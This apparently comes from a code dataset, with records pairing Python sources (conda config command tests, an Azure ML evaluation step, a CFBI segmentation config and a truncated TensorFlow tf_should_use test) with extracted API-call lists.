# Here is a comment
always_yes: 'yes'
"""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'changeps1', 'true')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- mychannel
- test
- defaults
create_default_packages:
- ipython
- numpy
changeps1: true
# Here is a comment
always_yes: 'yes'
"""
os.unlink(test_condarc)
# Test adding a new list key. We couldn't test this above because it
# doesn't work yet with odd whitespace
condarc = """\
channels:
- test
- defaults
always_yes: true
"""
with open(test_condarc, 'w') as f:
f.write(condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'disallow', 'perl')
assert stdout == stderr == ''
assert _read_test_condarc() == condarc + """\
disallow:
- perl
"""
os.unlink(test_condarc)
finally:
try:
pass
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_remove_force():
try:
# Finally, test --remove, --remove-key
run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
run_conda_command('config', '--file', test_condarc, '--set',
'always_yes', 'true')
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove', 'channels', 'test')
assert stdout == stderr == ''
assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults'],
'always_yes': True}
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove', 'channels', 'test', '--force')
assert stdout == ''
assert stderr == "Error: 'test' is not in the 'channels' key of the config file"
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove', 'disallow', 'python', '--force')
assert stdout == ''
assert stderr == "Error: key 'disallow' is not in the config file"
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove-key', 'always_yes', '--force')
assert stdout == stderr == ''
assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults']}
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove-key', 'always_yes', '--force')
assert stdout == ''
assert stderr == "Error: key 'always_yes' is not in the config file"
os.unlink(test_condarc)
finally:
try:
pass
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_bad_args():
try:
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'notarealkey', 'test')
assert stdout == ''
assert not exists(test_condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set',
'notarealkey', 'yes')
assert stdout == ''
assert not exists(test_condarc)
finally:
try:
pass
os.unlink(test_condarc)
except OSError:
pass
def test_invalid_rc():
# Some tests for unexpected input in the condarc, like keys that are the
# wrong type
try:
condarc = """\
channels:
"""
with open(test_condarc, 'w') as f:
f.write(condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--add', 'channels', 'test')
assert stdout == ''
assert stderr == """\
Error: Could not parse the yaml file. Use -f to use the
yaml parser (this will remove any structure or comments from the existing
.condarc file). Reason: key 'channels' should be a list, not NoneType."""
assert _read_test_condarc() == condarc
os.unlink(test_condarc)
finally:
try:
pass
os.unlink(test_condarc)
except OSError:
pass
def test_config_set():
# Test the config set command
# Make sure it accepts only boolean values for boolean keys and any value for string keys
try:
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'always_yes', 'yep')
assert stdout == ''
assert stderr == 'Error: Key: always_yes; yep is not a YAML boolean.'
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
def test_set_rc_string():
# Test setting string keys in .condarc
# We specifically test ssl_verify since it can be either a boolean or a string
try:
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'ssl_verify', 'yes')
assert stdout == ''
assert stderr == ''
verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify']
assert verify == 'yes'
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'ssl_verify', 'test_string.crt')
assert stdout == ''
assert stderr == ''
verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify']
assert verify == 'test_string.crt'
os.unlink(test_condarc)
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
| [
"os.path.exists",
"conda.config.rc.get",
"conda.config.pkgs_dir_from_envs_dir",
"os.path.join",
"conda.config.load_condarc",
"os.path.dirname",
"conda.utils.get_yaml",
"os.unlink",
"conda.config.get_proxy_servers",
"tests.helpers.run_conda_command",
"conda.config.normalize_urls"
]
| [((460, 470), 'conda.utils.get_yaml', 'get_yaml', ([], {}), '()\n', (468, 470), False, 'from conda.utils import get_yaml\n'), ((552, 569), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (559, 569), False, 'from os.path import dirname, join, exists\n'), ((4287, 4312), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (4302, 4312), False, 'import os\n'), ((1105, 1140), 'conda.config.load_condarc', 'config.load_condarc', (['config.rc_path'], {}), '(config.rc_path)\n', (1124, 1140), True, 'import conda.config as config\n'), ((1813, 1835), 'os.path.join', 'join', (['root_dir', '"""pkgs"""'], {}), "(root_dir, 'pkgs')\n", (1817, 1835), False, 'from os.path import dirname, join, exists\n'), ((4703, 4788), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (4720, 4788), False, 'from tests.helpers import run_conda_command\n'), ((4922, 4945), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (4931, 4945), False, 'import os\n'), ((5040, 5157), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""', '"""--add"""', '"""channels"""', '"""defaults"""'], {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'test', '--add', 'channels', 'defaults')\n", (5057, 5157), False, 'from tests.helpers import run_conda_command\n'), ((5284, 5307), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (5293, 5307), False, 'import os\n'), ((5385, 5470), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (5402, 5470), False, 'from tests.helpers import run_conda_command\n'), ((5537, 5622), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (5554, 5622), False, 'from tests.helpers import run_conda_command\n'), ((5814, 5837), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (5823, 5837), False, 'import os\n'), ((5910, 5996), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""always_yes"""', '"""true"""'], {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')\n", (5927, 5996), False, 'from tests.helpers import run_conda_command\n'), ((6112, 6135), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (6121, 6135), False, 'import os\n'), ((6650, 6710), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""'], {}), "('config', '--file', test_condarc, '--get')\n", (6667, 6710), False, 'from tests.helpers import run_conda_command\n'), ((7042, 7114), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""channels"""'], {}), "('config', '--file', test_condarc, '--get', 'channels')\n", (7059, 7114), False, 'from tests.helpers import run_conda_command\n'), ((7261, 7334), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""changeps1"""'], {}), "('config', '--file', test_condarc, '--get', 'changeps1')\n", (7278, 7334), False, 'from tests.helpers import run_conda_command\n'), ((7452, 7541), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""changeps1"""', '"""channels"""'], {}), "('config', '--file', test_condarc, '--get', 'changeps1',\n 'channels')\n", (7469, 7541), False, 'from tests.helpers import run_conda_command\n'), ((7707, 7786), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""allow_softlinks"""'], {}), "('config', '--file', test_condarc, '--get', 'allow_softlinks')\n", (7724, 7786), False, 'from tests.helpers import run_conda_command\n'), ((7878, 7956), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""track_features"""'], {}), "('config', '--file', test_condarc, '--get', 'track_features')\n", (7895, 7956), False, 'from tests.helpers import run_conda_command\n'), ((8048, 8123), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""invalid_key"""'], {}), "('config', '--file', test_condarc, '--get', 'invalid_key')\n", (8065, 8123), False, 'from tests.helpers import run_conda_command\n'), ((8244, 8321), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""not_valid_key"""'], {}), "('config', '--file', test_condarc, '--get', 'not_valid_key')\n", (8261, 8321), False, 'from tests.helpers import run_conda_command\n'), ((8427, 8450), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (8436, 8450), False, 'import os\n'), ((9343, 9403), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""'], {}), "('config', '--file', test_condarc, '--get')\n", (9360, 9403), False, 'from tests.helpers import run_conda_command\n'), ((9635, 9724), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""mychannel"""'], {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'mychannel')\n", (9652, 9724), False, 'from tests.helpers import run_conda_command\n'), ((9997, 10082), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""changeps1"""', '"""true"""'], {}), "('config', '--file', test_condarc, '--set', 'changeps1',\n 'true')\n", (10014, 10082), False, 'from tests.helpers import run_conda_command\n'), ((10338, 10361), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (10347, 10361), False, 'import os\n'), ((10663, 10748), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""disallow"""', '"""perl"""'], {}), "('config', '--file', test_condarc, '--add', 'disallow', 'perl'\n )\n", (10680, 10748), False, 'from tests.helpers import run_conda_command\n'), ((10879, 10902), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (10888, 10902), False, 'import os\n'), ((11183, 11268), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (11200, 11268), False, 'from tests.helpers import run_conda_command\n'), ((11284, 11370), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""always_yes"""', '"""true"""'], {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')\n", (11301, 11370), False, 'from tests.helpers import run_conda_command\n'), ((11404, 11491), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test')\n", (11421, 11491), False, 'from tests.helpers import run_conda_command\n'), ((11702, 11800), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove"""', '"""channels"""', '"""test"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test', '--force')\n", (11719, 11800), False, 'from tests.helpers import run_conda_command\n'), ((11952, 12052), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove"""', '"""disallow"""', '"""python"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove', 'disallow',\n 'python', '--force')\n", (11969, 12052), False, 'from tests.helpers import run_conda_command\n'), ((12190, 12286), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove-key"""', '"""always_yes"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')\n", (12207, 12286), False, 'from tests.helpers import run_conda_command\n'), ((12465, 12561), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove-key"""', '"""always_yes"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')\n", (12482, 12561), False, 'from tests.helpers import run_conda_command\n'), ((12684, 12707), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (12693, 12707), False, 'import os\n'), ((12953, 13040), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""notarealkey"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'notarealkey',\n 'test')\n", (12970, 13040), False, 'from tests.helpers import run_conda_command\n'), ((13144, 13230), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""notarealkey"""', '"""yes"""'], {}), "('config', '--file', test_condarc, '--set', 'notarealkey',\n 'yes')\n", (13161, 13230), False, 'from tests.helpers import run_conda_command\n'), ((13692, 13777), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (13709, 13777), False, 'from tests.helpers import run_conda_command\n'), ((14134, 14157), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (14143, 14157), False, 'import os\n'), ((14465, 14550), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""always_yes"""', '"""yep"""'], {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'yep')\n", (14482, 14550), False, 'from tests.helpers import run_conda_command\n'), ((14989, 15074), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""ssl_verify"""', '"""yes"""'], {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'yes')\n", (15006, 15074), False, 'from tests.helpers import run_conda_command\n'), ((15323, 15420), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""ssl_verify"""', '"""test_string.crt"""'], {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'test_string.crt')\n", (15340, 15420), False, 'from tests.helpers import run_conda_command\n'), ((15665, 15688), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (15674, 15688), False, 'import os\n'), ((2227, 2253), 'conda.config.get_proxy_servers', 'config.get_proxy_servers', ([], {}), '()\n', (2251, 2253), True, 'import conda.config as config\n'), ((2563, 2593), 'conda.config.rc.get', 'config.rc.get', (['"""channel_alias"""'], {}), "('channel_alias')\n", (2576, 2593), True, 'import conda.config as config\n'), ((2651, 2781), 'conda.config.normalize_urls', 'config.normalize_urls', (["['defaults', 'system', 'https://anaconda.org/username',\n 'file:///Users/username/repo', 'username']"], {}), "(['defaults', 'system',\n 'https://anaconda.org/username', 'file:///Users/username/repo', 'username']\n )\n", (2672, 2781), True, 'import conda.config as config\n'), ((2941, 3086), 'conda.config.normalize_urls', 'config.normalize_urls', (["['defaults', 'system', 'https://conda.anaconda.org/username',\n 'file:///Users/username/repo', 'username']", '"""osx-64"""'], {}), "(['defaults', 'system',\n 'https://conda.anaconda.org/username', 'file:///Users/username/repo',\n 'username'], 'osx-64')\n", (2962, 3086), True, 'import conda.config as config\n'), ((4647, 4677), 'os.path.exists', 'os.path.exists', (['"""test_condarc"""'], {}), "('test_condarc')\n", (4661, 4677), False, 'import os\n'), ((6192, 6215), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (6201, 6215), False, 'import os\n'), ((8508, 8531), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (8517, 8531), False, 'import os\n'), ((10960, 10983), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (10969, 10983), False, 'import os\n'), ((12764, 12787), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (12773, 12787), False, 'import os\n'), ((13097, 13117), 'os.path.exists', 'exists', (['test_condarc'], {}), '(test_condarc)\n', (13103, 13117), False, 'from os.path import dirname, join, exists\n'), ((13287, 13307), 'os.path.exists', 'exists', (['test_condarc'], {}), '(test_condarc)\n', (13293, 13307), False, 'from os.path import dirname, join, exists\n'), ((13364, 13387), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (13373, 13387), False, 'import os\n'), ((14213, 14236), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (14222, 14236), False, 'import os\n'), ((14736, 14759), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (14745, 14759), False, 'import os\n'), ((15727, 15750), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (15736, 15750), False, 'import os\n'), ((1873, 1895), 'os.path.join', 'join', (['root_dir', '"""envs"""'], {}), "(root_dir, 'envs')\n", (1877, 1895), False, 'from os.path import dirname, join, exists\n'), ((2127, 2160), 'conda.config.pkgs_dir_from_envs_dir', 'config.pkgs_dir_from_envs_dir', (['pi'], {}), '(pi)\n', (2156, 2160), True, 'import conda.config as config\n')] |
import os
from azureml.pipeline.steps import PythonScriptStep
from azureml.core.runconfig import RunConfiguration
from azureml.core.conda_dependencies import CondaDependencies
from azureml.pipeline.core import PipelineData
from azureml.pipeline.core import PipelineParameter
from azureml.pipeline.steps import EstimatorStep
from azureml.train.dnn import PyTorch
def evaluate_step(model_dir, test_dir, compute_target):
'''
This step evaluates the trained model on the testing data and outputs the accuracy.
:param model_dir: The reference to the directory containing the trained model
:type model_dir: DataReference
:param test_dir: The reference to the directory containing the testing data
:type test_dir: DataReference
:param compute_target: The compute target to run the step on
:type compute_target: ComputeTarget
:return: The preprocess step, step outputs dictionary (keys: accuracy_file)
:rtype: EstimatorStep, dict
'''
accuracy_file = PipelineData(
name='accuracy_file',
pipeline_output_name='accuracy_file',
datastore=test_dir.datastore,
output_mode='mount',
is_directory=False)
outputs = [accuracy_file]
outputs_map = { 'accuracy_file': accuracy_file }
estimator = PyTorch(
source_directory=os.path.dirname(os.path.abspath(__file__)),
entry_script='evaluate.py',
framework_version='1.3',
compute_target=compute_target,
use_gpu=True)
step = EstimatorStep(
name="Evaluate Model",
estimator=estimator,
estimator_entry_script_arguments=[
'--test_dir', test_dir,
'--model_dir', model_dir,
'--accuracy_file', accuracy_file
],
inputs=[model_dir, test_dir],
outputs=outputs,
compute_target=compute_target,
allow_reuse=True)
return step, outputs_map
| [
"os.path.abspath",
"azureml.pipeline.core.PipelineData",
"azureml.pipeline.steps.EstimatorStep"
]
| [((998, 1145), 'azureml.pipeline.core.PipelineData', 'PipelineData', ([], {'name': '"""accuracy_file"""', 'pipeline_output_name': '"""accuracy_file"""', 'datastore': 'test_dir.datastore', 'output_mode': '"""mount"""', 'is_directory': '(False)'}), "(name='accuracy_file', pipeline_output_name='accuracy_file',\n datastore=test_dir.datastore, output_mode='mount', is_directory=False)\n", (1010, 1145), False, 'from azureml.pipeline.core import PipelineData\n'), ((1509, 1798), 'azureml.pipeline.steps.EstimatorStep', 'EstimatorStep', ([], {'name': '"""Evaluate Model"""', 'estimator': 'estimator', 'estimator_entry_script_arguments': "['--test_dir', test_dir, '--model_dir', model_dir, '--accuracy_file',\n accuracy_file]", 'inputs': '[model_dir, test_dir]', 'outputs': 'outputs', 'compute_target': 'compute_target', 'allow_reuse': '(True)'}), "(name='Evaluate Model', estimator=estimator,\n estimator_entry_script_arguments=['--test_dir', test_dir, '--model_dir',\n model_dir, '--accuracy_file', accuracy_file], inputs=[model_dir,\n test_dir], outputs=outputs, compute_target=compute_target, allow_reuse=True\n )\n", (1522, 1798), False, 'from azureml.pipeline.steps import EstimatorStep\n'), ((1339, 1364), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1354, 1364), False, 'import os\n')] |
import torch
import argparse
import os
import sys
import cv2
import time
class Configuration():
def __init__(self):
self.EXP_NAME = 'mobilenetv2_cfbi'
self.DIR_ROOT = './'
self.DIR_DATA = os.path.join(self.DIR_ROOT, 'datasets')
self.DIR_DAVIS = os.path.join(self.DIR_DATA, 'DAVIS')
self.DIR_YTB = os.path.join(self.DIR_DATA, 'YTB/train')
self.DIR_YTB_EVAL = os.path.join(self.DIR_DATA, 'YTB/valid')
self.DIR_RESULT = os.path.join(self.DIR_ROOT, 'result', self.EXP_NAME)
self.DIR_CKPT = os.path.join(self.DIR_RESULT, 'ckpt')
self.DIR_LOG = os.path.join(self.DIR_RESULT, 'log')
self.DIR_IMG_LOG = os.path.join(self.DIR_RESULT, 'log', 'img')
self.DIR_TB_LOG = os.path.join(self.DIR_RESULT, 'log', 'tensorboard')
self.DIR_EVALUATION = os.path.join(self.DIR_RESULT, 'eval')
self.DATASETS = ['youtubevos']
self.DATA_WORKERS = 4
self.DATA_RANDOMCROP = (465, 465)
self.DATA_RANDOMFLIP = 0.5
self.DATA_MAX_CROP_STEPS = 5
self.DATA_MIN_SCALE_FACTOR = 1.
self.DATA_MAX_SCALE_FACTOR = 1.3
self.DATA_SHORT_EDGE_LEN = 480
self.DATA_RANDOM_REVERSE_SEQ = True
self.DATA_DAVIS_REPEAT = 30
self.DATA_CURR_SEQ_LEN = 3
self.DATA_RANDOM_GAP_DAVIS = 3
self.DATA_RANDOM_GAP_YTB = 3
self.PRETRAIN = True
self.PRETRAIN_FULL = False
self.PRETRAIN_MODEL = './pretrain_models/mobilenetv2-deeplabv3p.pth.tar'
self.MODEL_BACKBONE = 'mobilenet'
self.MODEL_MODULE = 'networks.cfbi.cfbi'
self.MODEL_OUTPUT_STRIDE = 16
self.MODEL_ASPP_OUTDIM = 256
self.MODEL_SHORTCUT_DIM = 48
self.MODEL_SEMANTIC_EMBEDDING_DIM = 100
self.MODEL_HEAD_EMBEDDING_DIM = 256
self.MODEL_PRE_HEAD_EMBEDDING_DIM = 64
self.MODEL_GN_GROUPS = 32
self.MODEL_GN_EMB_GROUPS = 25
self.MODEL_MULTI_LOCAL_DISTANCE = [2, 4, 6, 8, 10, 12]
self.MODEL_LOCAL_DOWNSAMPLE = True
self.MODEL_REFINE_CHANNELS = 64 # n * 32
self.MODEL_LOW_LEVEL_INPLANES = 256 if self.MODEL_BACKBONE == 'resnet' else 24
self.MODEL_RELATED_CHANNELS = 64
self.MODEL_EPSILON = 1e-5
self.MODEL_MATCHING_BACKGROUND = True
self.MODEL_GCT_BETA_WD = True
self.MODEL_FLOAT16_MATCHING = True
self.MODEL_FREEZE_BN = True
self.MODEL_FREEZE_BACKBONE = False
self.TRAIN_TOTAL_STEPS = 100000
self.TRAIN_START_STEP = 0
self.TRAIN_LR = 0.01
self.TRAIN_MOMENTUM = 0.9
self.TRAIN_COSINE_DECAY = False
self.TRAIN_WARM_UP_STEPS = 1000
self.TRAIN_WEIGHT_DECAY = 15e-5
self.TRAIN_POWER = 0.9
self.TRAIN_GPUS = 4
self.TRAIN_BATCH_SIZE = 8
self.TRAIN_START_SEQ_TRAINING_STEPS = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_TBLOG = False
self.TRAIN_TBLOG_STEP = 60
self.TRAIN_LOG_STEP = 20
self.TRAIN_IMG_LOG = False
self.TRAIN_TOP_K_PERCENT_PIXELS = 0.15
self.TRAIN_HARD_MINING_STEP = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_CLIP_GRAD_NORM = 5.
self.TRAIN_SAVE_STEP = 1000
self.TRAIN_MAX_KEEP_CKPT = 8
self.TRAIN_RESUME = False
self.TRAIN_RESUME_CKPT = None
self.TRAIN_RESUME_STEP = 0
self.TRAIN_AUTO_RESUME = True
self.TRAIN_GLOBAL_ATROUS_RATE = 1
self.TRAIN_LOCAL_ATROUS_RATE = 1
self.TRAIN_GLOBAL_CHUNKS = 20
self.TRAIN_DATASET_FULL_RESOLUTION = True
self.TEST_GPU_ID = 0
self.TEST_DATASET = 'youtubevos'
self.TEST_DATASET_FULL_RESOLUTION = False
self.TEST_DATASET_SPLIT = ['val']
self.TEST_CKPT_PATH = None
self.TEST_CKPT_STEP = None # if "None", evaluate the latest checkpoint.
self.TEST_FLIP = False
self.TEST_MULTISCALE = [1]
self.TEST_MIN_SIZE = None
self.TEST_MAX_SIZE = 800 * 1.3 if self.TEST_MULTISCALE == [1] else 800
self.TEST_WORKERS = 4
self.TEST_GLOBAL_CHUNKS = 4
self.TEST_GLOBAL_ATROUS_RATE = 2
self.TEST_LOCAL_ATROUS_RATE = 1
# dist
self.DIST_ENABLE = True
self.DIST_BACKEND = "gloo"
self.DIST_URL = "file://./sharefile"
self.DIST_START_GPU = 0
self.__check()
def __check(self):
if not torch.cuda.is_available():
raise ValueError('config.py: cuda is not avalable')
if self.TRAIN_GPUS == 0:
raise ValueError('config.py: the number of GPU is 0')
for path in [self.DIR_RESULT, self.DIR_CKPT, self.DIR_LOG, self.DIR_EVALUATION, self.DIR_IMG_LOG, self.DIR_TB_LOG]:
if not os.path.isdir(path):
os.makedirs(path)
cfg = Configuration()
| [
"torch.cuda.is_available",
"os.path.join",
"os.path.isdir",
"os.makedirs"
]
| [((219, 258), 'os.path.join', 'os.path.join', (['self.DIR_ROOT', '"""datasets"""'], {}), "(self.DIR_ROOT, 'datasets')\n", (231, 258), False, 'import os\n'), ((285, 321), 'os.path.join', 'os.path.join', (['self.DIR_DATA', '"""DAVIS"""'], {}), "(self.DIR_DATA, 'DAVIS')\n", (297, 321), False, 'import os\n'), ((346, 386), 'os.path.join', 'os.path.join', (['self.DIR_DATA', '"""YTB/train"""'], {}), "(self.DIR_DATA, 'YTB/train')\n", (358, 386), False, 'import os\n'), ((416, 456), 'os.path.join', 'os.path.join', (['self.DIR_DATA', '"""YTB/valid"""'], {}), "(self.DIR_DATA, 'YTB/valid')\n", (428, 456), False, 'import os\n'), ((483, 535), 'os.path.join', 'os.path.join', (['self.DIR_ROOT', '"""result"""', 'self.EXP_NAME'], {}), "(self.DIR_ROOT, 'result', self.EXP_NAME)\n", (495, 535), False, 'import os\n'), ((560, 597), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""ckpt"""'], {}), "(self.DIR_RESULT, 'ckpt')\n", (572, 597), False, 'import os\n'), ((621, 657), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""log"""'], {}), "(self.DIR_RESULT, 'log')\n", (633, 657), False, 'import os\n'), ((685, 728), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""log"""', '"""img"""'], {}), "(self.DIR_RESULT, 'log', 'img')\n", (697, 728), False, 'import os\n'), ((755, 806), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""log"""', '"""tensorboard"""'], {}), "(self.DIR_RESULT, 'log', 'tensorboard')\n", (767, 806), False, 'import os\n'), ((837, 874), 'os.path.join', 'os.path.join', (['self.DIR_RESULT', '"""eval"""'], {}), "(self.DIR_RESULT, 'eval')\n", (849, 874), False, 'import os\n'), ((4385, 4410), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (4408, 4410), False, 'import torch\n'), ((4726, 4745), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (4739, 4745), False, 'import os\n'), ((4763, 4780), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (4774, 4780), False, 'import os\n')] |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tf_should_use."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import sys
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util import tf_should_use
@contextlib.contextmanager
def reroute_error():
"""Temporarily reroute errors written to tf_logging.error into `captured`."""
with test.mock.patch.object(tf_should_use.tf_logging, 'error') as error:
with test.mock.patch.object(tf_should_use.tf_logging, 'fatal') as fatal:
yield error, fatal
class TfShouldUseTest(test.TestCase):
def testAddShouldUseWarningWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
h = tf_should_use._add_should_use_warning(c)
del h
with reroute_error() as (error, _):
in_this_function()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def testAddShouldUseFatalWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
